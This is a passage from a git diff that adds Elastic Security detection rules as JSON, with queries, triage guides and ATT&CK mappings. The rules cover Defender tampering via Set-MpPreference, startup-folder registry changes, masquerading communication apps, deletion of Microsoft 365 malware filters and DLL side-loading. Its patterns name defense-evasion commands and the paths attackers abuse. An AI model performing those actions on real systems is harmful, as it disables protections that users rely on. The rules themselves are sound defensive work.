detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c8b150f0-0164-475b-a75e-74b47800a9ff", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c8b150f0-0164-475b-a75e-74b47800a9ff_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_109.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_109.json new file mode 100644 index 00000000000..6853896a759 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_109.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings.", + "false_positives": [ + "Planned Windows Defender configuration changes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling Windows Defender Security Settings via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Disabling Windows Defender Security Settings via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the execution of commands that can tamper the Windows Defender antivirus features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which action was executed. Based on that, examine exceptions, antivirus state, sample submission, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n ?process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")\n ) and\n process.args : \"Set-MpPreference\" and process.args : (\"-Disable*\", \"Disabled\", \"NeverSend\", \"-Exclusion*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2019-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_110.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_110.json new file mode 100644 index 00000000000..34180933469 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_110.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings.", + "false_positives": [ + "Planned Windows Defender configuration changes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling Windows Defender Security Settings via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Disabling Windows Defender Security Settings via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the execution of commands that can tamper the Windows Defender antivirus features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which action was executed. Based on that, examine exceptions, antivirus state, sample submission, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n ?process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")\n ) and\n process.args : \"Set-MpPreference\" and process.args : (\"-Disable*\", \"Disabled\", \"NeverSend\", \"-Exclusion*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2019-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_5.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_5.json new file mode 100644 index 00000000000..30c30c46a0c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_5.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as Communication Apps", + "query": "process where host.os.type == \"windows\" and\n event.type == \"start\" and\n (\n /* Slack */\n (process.name : \"slack.exe\" and not\n (process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\",\n \"Slack Technologies, LLC\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* WebEx */\n (process.name : \"WebexHost.exe\" and not\n (process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and process.code_signature.trusted == true)\n ) or\n\n /* Teams */\n (process.name : \"Teams.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Discord */\n (process.name : \"Discord.exe\" and not\n (process.code_signature.subject_name == \"Discord Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* RocketChat */\n (process.name : \"Rocket.Chat.exe\" and not\n (process.code_signature.subject_name == \"Rocket.Chat Technologies Corp.\" and process.code_signature.trusted == true)\n ) or\n\n /* Mattermost */\n (process.name : \"Mattermost.exe\" and not\n (process.code_signature.subject_name == \"Mattermost, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* WhatsApp */\n (process.name : \"WhatsApp.exe\" and not\n (process.code_signature.subject_name in (\n \"WhatsApp LLC\",\n \"WhatsApp, Inc\",\n \"24803D75-212C-471A-BC57-9EF86AB91435\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* Zoom */\n (process.name : \"Zoom.exe\" and not\n (process.code_signature.subject_name == \"Zoom Video Communications, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Outlook */\n (process.name : \"outlook.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Thunderbird */\n (process.name : \"thunderbird.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c9482bfa-a553-4226-8ea2-4959bd4f7923", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "c9482bfa-a553-4226-8ea2-4959bd4f7923_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_103.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_103.json new file mode 100644 index 00000000000..83d9bff20d9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection.", + "false_positives": [ + "A malware filter rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_105.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_105.json new file mode 100644 index 00000000000..70473881c8a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection.", + "false_positives": [ + "A malware filter rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_206.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_206.json new file mode 100644 index 00000000000..a0b398d0fb3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection.", + "false_positives": [ + "A malware filter rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Malware Filter Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_7.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_7.json new file mode 100644 index 00000000000..55a192e0e73 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_7.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unsigned DLL Side-Loading from a Suspicious Folder", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n 